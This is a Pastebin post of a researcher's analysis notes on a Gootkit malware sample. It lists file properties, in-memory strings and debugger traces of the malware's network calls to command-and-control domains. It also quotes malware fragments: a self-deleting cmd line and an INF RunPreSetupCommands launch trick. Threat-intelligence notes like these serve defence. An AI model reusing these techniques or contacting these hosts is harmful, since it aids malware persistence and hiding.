API tools faq
paste
Advertisement
Neonprimetime

2018-04-02 My Online Security @dvk01uk #gootkit

Neonprimetime
Apr 2nd, 2018
456
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.02 KB | None | 0 0
raw download clone embed print report
  1. My Online Security @dvk01uk #gootkit
  2. https://twitter.com/dvk01uk/status/980835227554721803
  3. https://www.hybrid-analysis.com/sample/c71b7e669e5c614551ccd7157785d3e0e0c79277c1b65a1ce90732bc8f87b430?environmentId=100
  4.  
  5. runs cpu up to high % , uses up to 7mb memory, then stops
  6.  
  7. ------------
  8. random file properties
  9. ------------
  10. OriginalFilename,Ascend.exe
  11. LegalTrademarks,Adobe Systems Incorporated Copyright ©. 1999 - 2014
  12. file-description,Sexting Micrn Shuttle Specularmaterial Bitlocker Irowset
  13.  
  14. ------------
  15. interesting in-memory strings
  16. ------------
  17. 0x127d1c (11): mp3 (*.mp3)
  18. 0x54fa3f0 (72): /c ping localhost -n 4 & del /F /Q "
  19. 0x54fa44c (22): & move /Y "
  20. 0x54fa464 (20): .update" "
  21. 0x54fa47c (22): " > nul & "
  22. 0x54fa50c (18): MP3 file corrupted
  23. 0x556b430 (60): \SystemRoot\system32\mstsc.exe
  24. 0x556b4c8 (312): [Version]
  25. signature = "$CHICAGO$"
  26. [DefaultInstall]
  27. RunPreSetupCommands = %s:2
  28. 0x55c957f (21): 1$1+161>1E1R1\1c1i1p1
  29. 04BAFB24 0030B168 "RandomListenPortBase"
  30. 04BAFB28 04BAFD3C "6000" <-- securityintelligence.com blog says this is gootkit's default http proxy port
  31. RunPreSetupCommands = xhkecdteryxu:2
  32.  
  33. -------------
  34. interesting file contents [executable name].inf
  35. -------------
  36. [Version]
  37. signature = "$CHICAGO$"
  38. AdvancedINF = 2.5, "You need a new version of advpack.dll"
  39.  
  40. [DefaultInstall]
  41. RunPreSetupCommands = xhkecdteryxu:2
  42.  
  43. [xhkecdteryxu]
  44. C:\Users\Win732\Desktop\gootkit - Copy.exe
  45.  
  46.  
  47. -------------------------
  48. interesting api calls
  49. -------------------------
  50. 0A759140 | 50 | push eax | eax:"safenetssl.com"
  51. 0A759141 | FF 15 EC B2 76 0A | call dword ptr ds:[<&gethostbyname>] |
  52.  
  53. 04DAF990 0030B368 L"GET"
  54. 04DAF994 0030B348 L"/rbody320"
  55. 0A759B75 | FF 15 CC B2 76 0A | call dword ptr ds:[<&WinHttpOpenRequest |
  56.  
  57. 0A75CB43 | 52 | push edx | edx:L"https://safenetssl.com:80/"
  58. 0A75CB44 | FF 15 A8 B2 76 0A | call dword ptr ds:[<&WinHttpCrackUrl>] |
  59.  
  60. 0A758754 | 8B 4D EC | mov ecx,dword ptr ss:[ebp-14] | [ebp-14]:"securesslweb.com"
  61. 0A758757 | 51 | push ecx | ecx:&"/rpersist4/%d"
  62.  
  63. 0A760DB3 | 50 | push eax | eax:L"C:\\Users\\xxx\\Desktop\\[executable].exe --vwxyz"
  64. 0A760DB4 | 6A 00 | push 0 |
  65. 0A760DB6 | FF 15 0C B2 76 0A | call dword ptr ds:[<&CreateProcessW>] |
  66.  
  67. ---------------
  68. strings from ssl traffic
  69. ---------------
  70. safenetssl.com.
  71. ...........................Y...U..;b...7__..-DFX..2E.S..=.0i....}. .$...w|.....7.CWi...vW..?1A.........
  72. .................Q...M..J..G0..C0.... .........0
  73. . *.H..
  74. .....0f1.0 ..U....IA1.0
  75. ..U....unuvoo1.0...U.
  76. ..otufool1.0...U....cumee.cn1!0.. *.H..
  77. . ...dootatojo@tehe.edu0..
  78. 180402212052Z.
  79. 180502212052Z0f1.0 ..U....IA1.0
  80. ..U....unuvoo1.0...U.
  81. ..otufool1.0...U....cumee.cn1!0.. *.H..
  82. . ...dootatojo@tehe.edu0..0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!